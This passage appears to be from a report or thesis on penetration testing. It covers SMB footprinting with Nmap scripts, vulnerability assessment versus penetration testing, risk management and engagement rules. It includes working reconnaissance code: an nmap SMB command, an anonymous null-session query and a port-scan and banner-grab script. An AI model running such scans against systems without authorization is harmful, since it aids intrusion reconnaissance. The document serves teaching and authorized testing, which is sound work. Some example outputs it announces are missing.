matches specific criteria (for example, the host has the appropriate ports open). These scripts, which are written in the Lua programming language, can inspect the host in a much deeper and more sophisticated way than Nmap alone. Since Lua is a complete programming language, the possibilities for scripts are great. In addition to the power of scripts, another important aspect is the development culture. Since scripts can be written by anyone, and Lua is a relatively simple language for programmers to learn, it is not difficult for a programmer to begin developing his or her own scripts. With a fairly small team of core developers and an active mailing list, getting started in script development is easy.
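For orientation, a typical invocation of the SMB scripts discussed below looks like the following (the target placeholder is ours, and exact script availability depends on the installed Nmap version):

nmap -p 445 --script smb-os-discovery,smb-security-mode <target>

Here -p 445 limits the scan to the SMB port and --script selects the NSE scripts to run against hosts found with that port open.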

Server Message Block


The Server Message Block (SMB) protocol, which is commonly called the Common Internet File System (CIFS), is a protocol used by Microsoft services (and implemented by Samba, among others) to communicate with each other. SMB can function directly on TCP port 445 or over NetBIOS on port 139 (Petri, 2009). Although it was originally designed as a protocol to manage files remotely (Leach, 1998), SMB can use named pipes and the Distributed Computing Environment/Remote Procedure Call (DCE/RPC) system to call remote functions (Kenneth, 1999). This opens up great possibilities for footprinting servers. The SMB protocol is fairly complicated but, for the purposes of the Nmap scripts, only a small subset is used. Implementations of it vary greatly, especially when it is used by printers and other embedded devices; even the implementations in Samba and Windows are inconsistent with each other. As a result, the Nmap library for handling SMB connections has to be very tolerant of protocol differences and attempts to communicate with all implementations. In any implementation of SMB, three packets are sent to establish a session: SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP_ANDX, and SMB_COM_TREE_CONNECT_ANDX (see diagram) (Leach, 1998). In its response to all three messages, the server reveals information about itself. If the first three packets are successful, the client usually sends a fourth packet, SMB_COM_NT_CREATE_ANDX, which creates or opens a file or pipe.

SMB_COM_NEGOTIATE
The SMB_COM_NEGOTIATE packet is the first one sent by the client, and is the client's opportunity to indicate which protocols, flags, and options it understands. The

server responds with its preferred protocol, options, and flags, based on the client's list. The options and flags reveal certain configuration options to the client, such as whether or not message signatures are supported or required, whether or not the server requires plaintext passwords, and whether share-level or user-level authentication is understood. These options are probed by the script smb-security-mode.nse. The following is an example output against a typical configuration of Windows:

Some of these options are revealing from a penetration tester's perspective. For example, this server does not support message signing; as a result, man-in-the-middle attacks are possible. However, since message signing is not a default option on Windows, this is not a surprising state. If share-level security or plaintext passwords were required, however, that would be an interesting find. Implementing CIFS has more information about the different levels of security supported by SMB. In addition to the security information, the response to SMB_COM_NEGOTIATE also reveals the server's time and timezone, as well as the name of the server and its workgroup or domain membership. Revealing the time may be useful to a penetration tester because it is a sign of how well maintained a server is. The name and workgroup of the server can be helpful to a penetration tester when trying to determine the purpose of a server or a network, leading to more targeted attacks. The script smb-os-discovery.nse probes for the server's name and time. The following output is from smb-os-discovery run against a poorly maintained Windows 2000 test server:

From the name and time alone, it can be determined that the operating system is Windows 2000 ("RON-WIN2K-TEST"), that it is a test machine, and that the time is off by about an hour (the current time is 11:03, but the server returns 11:59). One may conclude that it is a test server running on an outdated operating system, and that it is poorly maintained or infrequently used. This information could be valuable to a penetration tester when choosing a target, since the chances that this server has unpatched vulnerabilities are high. On a large network, this can quickly give a sense of a network's composition and purpose.

SMB_COM_SESSION_SETUP_ANDX
The SMB_COM_SESSION_SETUP_ANDX packet is sent by the client immediately after the negotiate response is received. The packet's primary purpose is authentication; it contains the client's username, domain, and password. Unless plaintext authentication was requested in the negotiate packet, the password is hashed with one of Microsoft's hashing algorithms (both Lanman and NT Lanman (NTLM) are used by default). Recovering the password from one of these hashes is supposed to be difficult (although in practice it is usually straightforward). Instead of sending a username and password, the client may also establish a null (or anonymous) session by sending a blank username and a blank password. For the purposes of these scripts, four account types are defined. Anonymous accounts, commonly called a null session, offer little access to the system, except on Windows 2000. Guest accounts offer slightly more access, and can find some interesting information; the guest account typically has no password and is disabled by default on many Windows versions. Under certain configurations, such as Windows XP's default settings, all user accounts, including administrators, are treated as guests (Microsoft, 2005). User-level accounts are common, and are able to perform most checks; they are defined as any account on a system that is not in the Administrators group. Finally, administrator-level accounts are accounts in the Administrators group. Administrative accounts can run every test against Windows 2003 and earlier, but are essentially the same as user-level accounts on Windows Vista and higher unless user account control (UAC) is disabled. The server's response to the SMB_COM_SESSION_SETUP_ANDX packet contains a true/false value indicating whether or not the username/password combination was accepted. If it was accepted, which is always the case when an anonymous (null) session is requested, the server also includes its operating system and LAN manager version in the reply. The smb-os-discovery.nse script authenticates anonymously and displays this operating system information, and can be run in the same way against Windows 2000 and Windows 2003 hosts.
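As a rough illustration of what an anonymous session can reveal, the following sketch uses the third-party impacket library rather than Nmap (an assumption made here for illustration only); the target name and address are hypothetical.

# A sketch of null-session OS discovery over SMB, assuming the impacket
# library is installed (pip install impacket); the address is hypothetical.
from impacket.smbconnection import SMBConnection

conn = SMBConnection("TARGET", "192.168.1.10", sess_port=445)
conn.login("", "")                         # blank username and password = null session
print("OS:     " + conn.getServerOS())     # operating system and LAN manager string
print("Name:   " + conn.getServerName())   # NetBIOS server name
print("Domain: " + conn.getServerDomain()) # workgroup or domain membership
conn.logoff()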

Penetration Testing vs Vulnerability Assessment


1. A vulnerability assessment usually includes a mapping of the network and the systems connected to it, an identification of the services and service versions running, and the creation of a catalogue of the vulnerable systems.

2. A vulnerability assessment normally forms the first part of a penetration test. The additional step in a penetration test is the exploitation of any detected vulnerabilities, to confirm their existence and to determine the damage that might result from the vulnerability being exploited and the resulting impact on the organization.

3. In comparison to a penetration test, a vulnerability assessment is not as intrusive and does not always require the same technical capabilities. Unfortunately, it may be impossible to conduct an assessment thorough enough to guarantee that the most damaging (i.e., high-risk) vulnerabilities have been identified.

4. The difference between a penetration test and a vulnerability assessment is becoming a significant issue in the penetration testing profession. There are many penetration testers who are only capable of performing vulnerability assessments and yet present themselves as penetration testers. If a company is unfamiliar with the process, it may think a networked system has been fully assessed when this is not the case.

5. Vulnerability analysis is the process of identifying vulnerabilities on a network, whereas penetration testing is focused on actually gaining unauthorized access to the tested systems and using that access to the network or data, as directed by the client.

6. A vulnerability analysis provides an overview of the flaws that exist on the system, while a penetration test goes on to provide an impact analysis of the flaws, identifying the possible impact of each flaw on the underlying network, operating system, database, etc.

7. Vulnerability assessments use scanners to identify vulnerabilities, which produces many false positives. In penetration testing, because a human exploits and verifies the vulnerabilities, false positives are largely eliminated.

8. Vulnerability analysis is more of a passive process. In vulnerability analysis you use software tools that analyze both network traffic and systems to identify any exposures that increase vulnerability to attacks. Penetration testing is an active practice wherein ethical hackers are employed to simulate an attack and test the resistance of the network and systems.

9. Vulnerability analysis deals with potential risks, whereas penetration testing is actual proof of concept. Vulnerability analysis is just a process of identifying and quantifying the security vulnerabilities in a system; it does not provide validation of those vulnerabilities. Validation can only be done by penetration testing.

10. The scope of a penetration test can vary from a vulnerability analysis to fully exploiting the targets to destructive testing. A penetration test includes a vulnerability analysis, but it goes one step further: the security of the system is evaluated by simulating an attack as a malicious hacker would usually carry it out. For instance, a vulnerability analysis exercise might identify the absence of anti-virus software on the system, or open ports, as a vulnerability. The penetration test will determine the level to which existing vulnerabilities can be exploited and the damage that can be inflicted as a result.

11. A vulnerability analysis answers the question: what are the present vulnerabilities and how do we fix them? A penetration test simply answers the questions: can any external attacker or internal intruder break in, and what can they attain?

12. A vulnerability analysis works to improve security posture and develop a more mature, integrated security program, whereas a penetration test is only a snapshot of your security program's effectiveness. Commonly a vulnerability assessment goes through the following phases: Information Gathering, Port Scanning, Enumeration, Threat Profiling & Risk Identification, Network Level Vulnerability Scanning, Application Level Vulnerability Scanning, Mitigation Strategies Creation, Report Generation, and Support. A penetration testing service, however, has the following phases: Information Gathering, Port Scanning, Enumeration, Social Engineering, Threat Profiling & Risk Identification, Network Level Vulnerability Assessment, Application Level Vulnerability Assessment, Exploit Research & Development, Exploitation, Privilege Escalation, Engagement Analysis, Mitigation Strategies, Report Generation, and Support.

RISK ANALYSIS
Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations to better manage IT-related mission risks. In addition, this section provides information on the selection of cost-effective security controls. These controls can be used to mitigate risk for the better protection of mission-critical information and the IT systems that process, store, and carry this information. Organizations may choose to expand or abbreviate the comprehensive processes and steps suggested in this guide and tailor them to their environment in managing IT-related mission risks.

OBJECTIVE OF RISK MANAGEMENT


The objective of performing risk management is to enable the organization to accomplish its mission(s) (1) by better securing the IT systems that store, process, or transmit organizational information; (2) by enabling management to make well-informed risk management decisions to justify the expenditures that are part of an IT budget; and (3) by assisting management in authorizing (or accrediting) the IT systems on the basis of the supporting documentation resulting from the performance of risk management. This section provides a common foundation for experienced and inexperienced, technical, and non-technical personnel who support or use the risk management process for their IT systems, including:

- Senior management, the mission owners, who make decisions about the IT security budget
- Federal Chief Information Officers, who ensure the implementation of risk management for agency IT systems and the security provided for these IT systems
- The Designated Approving Authority (DAA), who is responsible for the final decision on whether to allow operation of an IT system
- The IT security program manager, who implements the security program
- Information system security officers (ISSO), who are responsible for IT security
- IT system owners of system software and/or hardware used to support IT functions
- Information owners of data stored, processed, and transmitted by the IT systems
- Business or functional managers, who are responsible for the IT procurement process
- Technical support personnel (e.g., network, system, application, and database administrators; computer specialists; data security analysts), who manage and administer security for the IT systems
- IT system and application programmers, who develop and maintain code that could affect system and data integrity
- IT quality assurance personnel, who test and ensure the integrity of the IT systems and data
- Information system auditors, who audit IT systems
- IT consultants, who support clients in risk management

RISK MANAGEMENT OVERVIEW


This section describes the risk management methodology, how it fits into each phase of the SDLC, and how the risk management process is tied to the process of system authorization (or accreditation).

Risk Management (Risk = Threat x Vulnerability)


You need to understand the risks involved in doing a pen test. It could cause disturbances such as unexpected server crashes, data corruption, or performance brought to a standstill, resulting in loss of revenue and productivity. When unannounced tests are scheduled, they normally carry a higher level of risk, and the chances of encountering unexpected problems are even greater. A successful pen test depends on the expertise and experience of the pen testing team. Pen test teams need to plan for risks and ensure that contingency plans are in place, to optimize time and resource utilization. You need to determine the risk factor of each asset and its value in order to estimate the damage or loss that could occur in the event of security breaches and disturbances.

IMPORTANCE OF RISK MANAGEMENT


Risk management encompasses three processes: risk assessment, risk mitigation, and evaluation and assessment. The risk assessment process includes the identification and evaluation of risks and risk impacts, and the recommendation of risk-reducing measures. Section 4 describes risk mitigation, which refers to prioritizing, implementing, and maintaining the appropriate risk-reducing measures recommended by the risk assessment process. Section 5 discusses the continual evaluation process and keys for implementing a successful risk management program. The DAA or system authorizing official is responsible for determining whether the remaining risk is at an acceptable level or whether additional security controls should be implemented to further reduce or eliminate the residual risk before authorizing (or accrediting) the IT system for operation. Risk management is the process that allows IT managers to balance the operational and economic costs of protective measures and achieve gains in mission capability by protecting the IT systems and data that support their organizations' missions. This process is not unique to the IT environment; indeed, it pervades decision-making in all areas of our daily lives. Take the case of home security, for example. Many people decide to have home security systems installed and pay a monthly fee to a service provider to have these systems monitored for the better protection of their property. Presumably, the homeowners have weighed the cost of system installation and monitoring against the value of their household goods and their family's safety, a fundamental mission need. The head of an organizational unit must ensure that the organization has the capabilities needed to accomplish its mission. These mission owners must determine the security capabilities that their IT systems must have to provide the desired level of mission support in the face of real-world threats. Most organizations have tight budgets for IT security; therefore, IT security spending must be reviewed as thoroughly as other management decisions. A well-structured risk management methodology, when used effectively, can help management identify appropriate controls for providing the mission-essential security capabilities.

INTEGRATION OF RISK MANAGEMENT INTO SDLC


Minimizing negative impact on an organization and the need for a sound basis for decision making are the fundamental reasons organizations implement a risk management process for their IT systems. Effective risk management must be totally integrated into the SDLC. An IT system's SDLC has five phases: initiation, development or acquisition, implementation, operation or maintenance, and disposal. In some cases, an IT system may occupy several of these phases at the same time. However, the risk management methodology is the same regardless of the SDLC phase for which the assessment is being conducted. Risk management is an iterative process that can be performed during each major phase of the SDLC. The table below describes the characteristics of each SDLC phase and indicates how risk management can be performed in support of each phase.

Integration of Risk Management into the SDLC


SDLC Phases, Phase Characteristics, and Support from Risk Management Activities:

Phase 1: Initiation
Characteristics: The need for an IT system is expressed and the purpose and scope of the IT system is documented.
Risk management support: Identified risks are used to support the development of the system requirements, including security requirements, and a security concept of operations (strategy).

Phase 2: Development or Acquisition
Characteristics: The IT system is designed, purchased, programmed, developed, or otherwise constructed.
Risk management support: The risks identified during this phase can be used to support the security analyses of the IT system that may lead to architecture and design tradeoffs during system development.

Phase 3: Implementation
Characteristics: The system security features should be configured, enabled, tested, and verified.
Risk management support: The risk management process supports the assessment of the system implementation against its requirements and within its modeled operational environment. Decisions regarding risks identified must be made prior to system operation.

Phase 4: Operation or Maintenance
Characteristics: The system performs its functions. Typically the system is being modified on an ongoing basis through the addition of hardware and software and by changes to organizational processes, policies, and procedures.
Risk management support: Risk management activities are performed for periodic system reauthorization (or reaccreditation) or whenever major changes are made to an IT system in its operational, production environment (e.g., new system interfaces).

Phase 5: Disposal
Characteristics: This phase may involve the disposition of information, hardware, and software. Activities may include moving, archiving, discarding, or destroying information and sanitizing the hardware and software.
Risk management support: Risk management activities are performed for system components that will be disposed of or replaced to ensure that the hardware and software are properly disposed of, that residual data is appropriately handled, and that system migration is conducted in a secure and systematic manner.

RISK ASSESSMENT
Risk assessment is the first process in the risk management methodology. Organizations use risk assessment to determine the extent of the potential threat and the risk associated with an IT system throughout its SDLC. The output of this process helps to identify appropriate controls for reducing or eliminating risk during the risk mitigation process, as discussed in Section 4. Risk is a function of the likelihood of a given threat-source's exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organization. To determine the likelihood of a future adverse event, threats to an IT system must be analyzed in conjunction with the potential vulnerabilities and the controls in place for the IT system. Impact refers to the magnitude of harm that could be caused by a threat's exercise of a vulnerability. The level of impact is governed by the potential mission impacts and in turn produces a relative value for the IT assets and resources affected (e.g., the criticality and sensitivity of the IT system components and data). The risk assessment methodology encompasses nine primary steps:
1. System Characterization
2. Threat Identification
3. Vulnerability Identification
4. Control Analysis
5. Likelihood Determination
6. Impact Analysis
7. Risk Determination
8. Control Recommendations
9. Results Documentation

IMPACT ANALYSIS
The next major step in measuring the level of risk is to determine the adverse impact resulting from a successful threat exercise of a vulnerability. Before beginning the impact analysis, it is necessary to obtain the following information:
- System mission (e.g., the processes performed by the IT system)
- System and data criticality (e.g., the system's value or importance to an organization)
- System and data sensitivity
This information can be obtained from existing organizational documentation, such as the mission impact analysis report or asset criticality assessment report. A mission impact analysis (also known as a business impact analysis [BIA] in some organizations) prioritizes the impact levels associated with the compromise of an organization's information assets based on a qualitative or quantitative assessment of the sensitivity and criticality of those assets. An asset criticality assessment identifies and prioritizes the sensitive and critical organizational information assets (e.g., hardware, software, systems, services, and related technology assets) that support the organization's critical missions. If this documentation does not exist or such assessments for the organization's IT assets have not been performed, the system and data sensitivity can be determined based on the level of protection required to maintain the availability, integrity, and confidentiality of the system and its data.

Regardless of the method used to determine how sensitive an IT system and its data are, the system and information owners are the ones responsible for determining the impact level for their own system and information. Consequently, in analyzing impact, the appropriate approach is to interview the system and information owner(s). The adverse impact of a security event can be described in terms of loss or degradation of any, or a combination of any, of the following three security goals: integrity, availability, and confidentiality. The following list provides a brief description of each security goal and the consequence (or impact) of its not being met:

Loss of Integrity. System and data integrity refers to the requirement that information be protected from improper modification. Integrity is lost if unauthorized changes are made to the data or IT system by either intentional or accidental acts. If the loss of system or data integrity is not corrected, continued use of the contaminated system or corrupted data could result in inaccuracy, fraud, or erroneous decisions. Also, violation of integrity may be the first step in a successful attack against system availability or confidentiality. For all these reasons, loss of integrity reduces the assurance of an IT system.

Loss of Availability. If a mission-critical IT system is unavailable to its end users, the organization's mission may be affected. Loss of system functionality and operational effectiveness, for example, may result in loss of productive time, thus impeding the end users' performance of their functions in supporting the organization's mission.

Loss of Confidentiality. System and data confidentiality refers to the protection of information from unauthorized disclosure. The impact of unauthorized disclosure of confidential information can range from the jeopardizing of national security to the disclosure of Privacy Act data. Unauthorized, unanticipated, or unintentional disclosure could result in loss of public confidence, embarrassment, or legal action against the organization.

Some tangible impacts can be measured quantitatively in lost revenue, the cost of repairing the system, or the level of effort required to correct problems caused by a successful threat action. Other impacts (e.g., loss of public confidence, loss of credibility, damage to an organization's interests) cannot be measured in specific units but can be qualified or described in terms of high, medium, and low impact. Because of the generic nature of this discussion, this guide designates and describes only the qualitative categories: high, medium, and low impact.

RISK DETERMINATION
The purpose of this step is to assess the level of risk to the IT system. The determination of risk for a particular threat/vulnerability pair can be expressed as a function of:
- The likelihood of a given threat-source's attempting to exercise a given vulnerability
- The magnitude of the impact should a threat-source successfully exercise the vulnerability
- The adequacy of planned or existing security controls for reducing or eliminating risk
To measure risk, a risk scale and a risk-level matrix must be developed.

Likelihood Determination
To derive an overall likelihood rating that indicates the probability that a potential vulnerability may be exercised within the construct of the associated threat environment, the following governing factors must be considered:
- Threat-source motivation and capability
- Nature of the vulnerability
- Existence and effectiveness of current controls
The likelihood that a potential vulnerability could be exercised by a given threat-source can be described as high, medium, or low.

Likelihood Definitions

Risk-Level Matrix
The final determination of mission risk is derived by multiplying the ratings assigned for threat likelihood (e.g., probability) and threat impact. The table below shows how the overall risk ratings might be determined based on inputs from the threat likelihood and threat impact categories. The matrix is a 3 x 3 matrix of threat likelihood (High, Medium, and Low) and threat impact (High, Medium, and Low). Depending on the site's requirements and the granularity of risk assessment desired, some sites may use a 4 x 4 or a 5 x 5 matrix. The latter can include a Very Low/Very High threat likelihood and a Very Low/Very High threat impact to generate a Very Low/Very High risk level. A Very High risk level may require possible system shutdown or stopping of all IT system integration and testing efforts. The sample matrix shows how the overall risk levels of High, Medium, and Low are derived. The determination of these risk levels or ratings may be subjective. The rationale for this justification can be explained in terms of the probability assigned for each threat likelihood level and a value assigned for each impact level. For example:
- The probability assigned for each threat likelihood level is 1.0 for High, 0.5 for Medium, and 0.1 for Low
- The value assigned for each impact level is 100 for High, 50 for Medium, and 10 for Low

Risk-Level Matrix
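The sample matrix can be derived from the values above. The following sketch reproduces it; the probability and impact values come from the text, while the thresholds used to bucket the product into High, Medium, and Low risk (above 50, above 10 up to 50, and 1 to 10, respectively) are an assumption consistent with those values.

# A sketch of the 3 x 3 risk-level matrix derivation described above.
# Probability and impact values are from the text; the High/Medium/Low
# thresholds on the product are assumptions consistent with those values.
LIKELIHOOD = {"High": 1.0, "Medium": 0.5, "Low": 0.1}
IMPACT = {"High": 100, "Medium": 50, "Low": 10}

def risk_level(likelihood, impact):
    score = LIKELIHOOD[likelihood] * IMPACT[impact]
    if score > 50:
        return "High"    # e.g. High likelihood x High impact = 100
    if score > 10:
        return "Medium"  # e.g. High likelihood x Medium impact = 50
    return "Low"         # e.g. Low likelihood x Low impact = 1

for lk in ("High", "Medium", "Low"):
    for im in ("High", "Medium", "Low"):
        print(lk, "likelihood x", im, "impact ->", risk_level(lk, im))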

KEY ROLES
Risk management is a management responsibility. This section describes the key roles of the personnel who should support and participate in the risk management process.

Senior Management. Senior management, under the standard of due care and ultimate responsibility
for mission accomplishment, must ensure that the necessary resources are effectively applied to develop the capabilities needed to accomplish the mission. They must also assess and incorporate results of the risk assessment activity into the decision making process. An effective risk management program that assesses and mitigates IT-related mission risks requires the support and involvement of senior management.

Chief Information Officer (CIO). The CIO is responsible for the agency's IT planning, budgeting,
and performance including its information security components. Decisions made in these areas should be based on an effective risk management program.

System and Information Owners. The system and information owners are responsible for ensuring
that proper controls are in place to address integrity, confidentiality, and availability of the IT systems and data they own. Typically the system and information owners are responsible for changes to their IT systems. Thus, they usually have to approve and sign off on changes to their IT systems (e.g., system enhancement, major changes to the software and hardware). The system and information owners must therefore understand their role in the risk management process and fully support this process.

Business and Functional Managers. The managers responsible for business operations and IT
procurement process must take an active role in the risk management process. These managers are the individuals with the authority and responsibility for making the trade-off decisions essential to mission accomplishment. Their involvement in the risk management process enables the achievement of proper security for the IT systems, which, if managed properly, will provide mission effectiveness with a minimal expenditure of resources.

ISSO. IT security program managers and computer security officers are responsible for their
organizations' security programs, including risk management. Therefore, they play a leading role in introducing an appropriate, structured methodology to help identify, evaluate, and minimize risks to the IT systems that support their organizations' missions. ISSOs also act as major consultants in support of senior management to ensure that this activity takes place on an ongoing basis.

IT Security Practitioners. IT security practitioners (e.g., network, system, application, and database administrators; computer specialists; security analysts; security consultants) are responsible for proper implementation of security requirements in their IT systems. As changes occur in the existing IT system environment (e.g., expansion in network connectivity, changes to the existing infrastructure and organizational policies, introduction of new technologies), the IT security practitioners must support or use the risk management process to identify and assess new potential risks and implement new security controls as needed to safeguard their IT systems.

Security Awareness Trainers (Security/Subject Matter Professionals).

The organization's personnel are the users of the IT systems. Use of the IT systems and data according to an organization's policies, guidelines, and rules of behavior is critical to mitigating risk and protecting the organization's IT resources. To minimize risk to the IT systems, it is essential that system and application users be provided with security awareness training. Therefore, the IT security trainers or security/subject matter professionals must understand the risk management process so that they can develop appropriate training materials and incorporate risk assessment into training programs to educate the end users.

3.3 Roles and Responsibilities of Penetration Testers

A security penetration test is an activity in which a test team (hereafter referred to as the Pen Tester) attempts to circumvent the security processes and controls of a computer system. Posing as external unauthorized intruders, the test team attempts to obtain privileged access, extract information, and demonstrate the ability to manipulate the target computer in ways that would be unauthorized had they occurred outside the scope of the test. Due to the sensitive nature of the testing, specific rules of engagement are necessary to ensure that testing is performed in a manner that minimizes impact on operations while maximizing the usefulness of the test results. This document provides guidance and formal documentation for the planning, approval, execution and reporting of external penetration testing.

Roles and Responsibilities


Director of Information Security shall:
a. Be responsible for coordination of the penetration test activities and schedule, and notify management of planned activities.

Pen Test Point of Contact (POC) shall:
a. Be responsible for the penetration test team and be the primary interface with the Director of Information Security for all penetration test activities.
b. Develop the documentation and plans for the penetration test.
c. Identify and assign roles to the Pen Tester team, identify major milestones for the tasks of the team, identify estimated dates upon which the major milestones will be completed, and indicate the critical path.
d. Identify the steps that will be taken to protect the Test Plan, results and final deliverables.
e. Coordinate the Information Security Penetration test with the Director of Information Security.
f. Assure that all pertinent reports, logs, test results, working papers and data related to the penetration tests are being generated and maintained, and are being stored appropriately.

Procedure: The Pen Test POC will be the individual responsible for coordination of the penetration test activities and schedules, and will notify management of planned activities. The Pen Tester will be responsible for the penetration test team and be the primary interface with the Pen Test POC for all penetration test activities. The Pen Tester shall develop the documentation and plans for the penetration test (see Appendices A and B for the Penetration Test Plan Template). As part of this effort, the Pen Tester shall identify and assign roles to the Pen Tester team, identify major milestones for the tasks of the team, identify estimated dates upon which the major milestones will be completed, and indicate the critical path. The Pen Tester shall also identify the steps that will be taken to protect the Test Plan, results, and final deliverables.

Conducting the Penetration Test, the following tasks shall be performed by the Pen Tester for sites tested:

a. Introductory Briefing
- Introduce key players
- Provide overview of Pen Tester capabilities
- Explain objectives of the penetration test
- Review resources, logistics and schedule requirements
- Schedule technical and administrative face-to-face meetings

b. Executive In-Briefing
- Introduce Pen Tester and key penetration testing staff
- Review objectives of the penetration test
- Review selected target systems
- Review plan and schedule for activities
- Address issues and concerns
- The Penetration Testing Plan and Rules of Engagement shall be signed by all parties prior to the start of testing activities

c. External Penetration Testing
- Plan and schedule
- Conduct penetration testing with the team (reconnaissance, exploitation of vulnerabilities, intrusion, compromise, analysis and recommendations)

d. Analysis of Data and Findings (off-site)
- Correlate data and findings from discoveries and reviews
- Analyze results from penetration testing
- Compare requirements with industry standards
- Document findings and prioritize recommended corrective actions with references to industry standards and requirements
- Provide briefing of findings, recommendations, and associated impacts to the Director of Information Security and the Assistant Vice President of Information Security and Special Projects

e. Completion Briefing
- Summarize findings
- Present final reports
- Discuss external penetration testing results
- Discuss evaluation of the test site's IT security program and management structure
- Discuss overall recommendations

The Pen Tester shall remove all data related to the IT Security Penetration test for each site from the Pen Tester's computer(s) by a method approved by the UC Information Security Director. All documents, data logs/files, test results and working papers generated by the Pen Tester for the IT Security Penetration test at each site shall not be retained by the Pen Tester.

3. Planning: Penetration Test Plan Template

4. Approval

5. Execution

Initial reconnaissance: Build up an understanding of the company or organization. This will include interrogating public domain sources such as whois records, finding IP ranges, ISPs, contact names, DNS records, website crawling, etc.

Service determination: The collection of IP addresses enables the investigation of available services. Scans for known vulnerabilities can also be performed using tools such as Nessus or ISS. If firewalls are found, attempts will be made to determine the firewall type. Note that most attacks are not against firewalls, but rather pass through the firewalls to the servers behind them (see the earlier article on Web application security, Network Security, August edition).

Enumeration: The operating system and applications are identified. Banner grabbing, IP fingerprinting and mail bouncing should reveal servers. Usernames, exports, shares, etc. are also determined if possible.

Gain access: Once the testers have more knowledge of the systems, relevant vulnerability information will be researched, or new vulnerabilities found, in order to (hopefully) gain some level of access to the systems.

Privilege escalation: If an initial foothold can be gained on any of the systems being tested, the next step will be to gain as much privilege as possible, i.e. NT Administrator or UNIX root privileges.

6. Reporting summarized findings.
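The service-determination and enumeration steps above can be illustrated with a simple TCP connect scan and banner grab. This is a minimal sketch only; the target address and port list are hypothetical, and only hosts explicitly in scope should ever be scanned.

# A minimal connect() scan with banner grabbing, sketching the service
# determination and enumeration steps; target and ports are hypothetical.
import socket

TARGET = "192.168.1.10"
PORTS = [21, 22, 25, 80, 139, 443, 445]

for port in PORTS:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)
    try:
        sock.connect((TARGET, port))   # full TCP handshake: port is open
        banner = b""
        try:
            banner = sock.recv(1024)   # many services announce themselves
        except socket.timeout:
            pass
        print(port, "open", banner.decode(errors="replace").strip())
    except OSError:
        pass                           # closed, filtered, or unreachable
    finally:
        sock.close()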

7. External Penetration Report Template

Introduction
- Date carried out
- Testing Team details: 1. Name 2. Contact Nos. 3. Relevant experience if required

Network Details
1. Peer to Peer, Client-Server, Domain Model, Active Directory integrated
2. Number of servers and workstations
3. Operating system details
4. Major software applications
5. Hardware configuration and setup
6. Interconnectivity and by what means, i.e. T1, Satellite, Wide Area Network, Leased Line, Dial-up, etc.
7. Encryption/VPNs utilized, etc.
8. Role of the network or system

Scope of Test
1. Constraints and limitations imposed on the team, i.e. out-of-scope items, hardware, IP addresses
2. Constraints, limitations or problems encountered by the team during the actual test
3. Purpose of test, e.g. security assurance for the Code of Connection
4. Type of Test

5. Test Type

White-Box: The testing team has knowledge of the network and has been supplied with network diagrams, hardware, operating system and application details, etc. prior to a test being carried out. This does not equate to a truly blind test but can speed up the process a great deal and leads to more accurate results being obtained. The amount of prior knowledge leads to a test targeting specific operating systems, applications and network devices that reside on the network, rather than spending time enumerating what could possibly be on the network. This type of test equates to a situation whereby an attacker may have complete knowledge of the internal network.

Black-Box: No prior knowledge is supplied; for example, a web based test is to be carried out and only the details of a website URL or IP address are supplied to the testing team. It would be their role to attempt to break into the company website/network. This would equate to an external attack carried out by a malicious hacker.

Grey-Box: The testing team would simulate an attack that could be carried out by a disgruntled, disaffected staff member. The testing team would be supplied with appropriate user-level privileges and a user account, and access permitted to the internal network by relaxation of specific security policies present on the network, i.e. port-level security.

1. Executive Summary (Brief and Non-technical)

(Each finding is then listed against its problem area, e.g. software failings and vulnerabilities exploited.)

3.4 Proposed work


Penetration testing is one of the oldest methods for assessing the security of a computer system. In the early 1970s, the Department of Defense used this method to demonstrate the security weaknesses in computer systems and to initiate the development of programs to create more secure systems. Penetration testing is increasingly used by organizations to assure the security of information systems and services, so that security weaknesses can be fixed before they get exposed. However, when a penetration test is performed without a well-planned and professional approach, it can result in exactly what it is supposed to prevent. In order to protect company data, companies often take measures to guarantee the availability, confidentiality and integrity of data, or to ensure access for authorized persons only. These measures include security concepts, authorization concepts and firewall systems. However, establishing these kinds of security systems is no guarantee that the legal requirements are met. Rather, the system's compliance with the legal requirements and stipulations must be checked for each individual case. Penetration tests are a suitable means of verifying the effectiveness of such measures in certain areas. The objective of the penetration testing service is to identify and report on security vulnerabilities to allow the Company to close the issues in a planned manner, thus significantly raising the level of its security protection. The Company understands that Internet security is a continually growing and changing field and that penetration testing does not mean that the Company's site is secure from every form of attack. There is no such thing as 100% security testing; for example, it is never possible to test for vulnerabilities in software or systems that are not known at the time of testing, or to test the mathematically complete set of all possible inputs/outputs for each software component in use. Further, security breaches can and frequently do come from internal sources whose access is not a function of system configuration and/or external access security issues. There are many methodologies to choose from, and there is no such thing as the one right methodology. Every penetration tester has his/her own approach to testing, but each one uses a methodology in order for the test to be carried out professionally, effectively and in less time. If a tester has no methodology to use in a test, the result might be:
- incomplete testing (e.g. the tester might not fulfill all of the requirements)
- wasted time (e.g. a lot of time will be spent re-ordering the test into a beginning-to-end format)
- wasted effort (e.g. the testers might end up testing the same thing)
- ineffective testing (e.g. the results and the reporting might not suit the requirements of the client)

A methodology is a map by which you reach your final destination (the end of the test); without one, the testers might get lost (and end up with the problems mentioned above).

Proposed methodology
Proposed methodology model

While there are several available methodologies to choose from, each penetration tester must have their own methodology planned and ready for maximum effectiveness and to present to the client. In the proposed methodology, there are three main elements that must be fully understood and followed:

1. Information. Information gathering is essentially using the Internet to find all the information you can about the target (company and/or person) using both technical (DNS/WHOIS) and non-technical (search engines, news groups, mailing lists, etc.) methods. Whilst conducting information gathering, it is important to be as imaginative as possible. Attempt to explore every possible avenue to gain more understanding of your target and its resources. Anything you can get hold of during this stage of testing is useful: company brochures, business cards, leaflets, newspaper adverts, internal paperwork, etc. Information gathering does not require that the assessor establishes contact with the target system. Information is collected (mainly) from public sources on the Internet and organizations that hold public information (e.g. tax agencies, libraries, etc.).

The information gathering section of the penetration test is important for the penetration tester. Assessments are generally limited in time and resources. Therefore, it is critical to identify the points that are most likely to be vulnerable, and to focus on them. Even the best tools are useless if not used appropriately and in the right place and time. That is the reason why experienced testers invest a significant amount of time in information gathering. [4]

There are commonly two types of penetration testing:
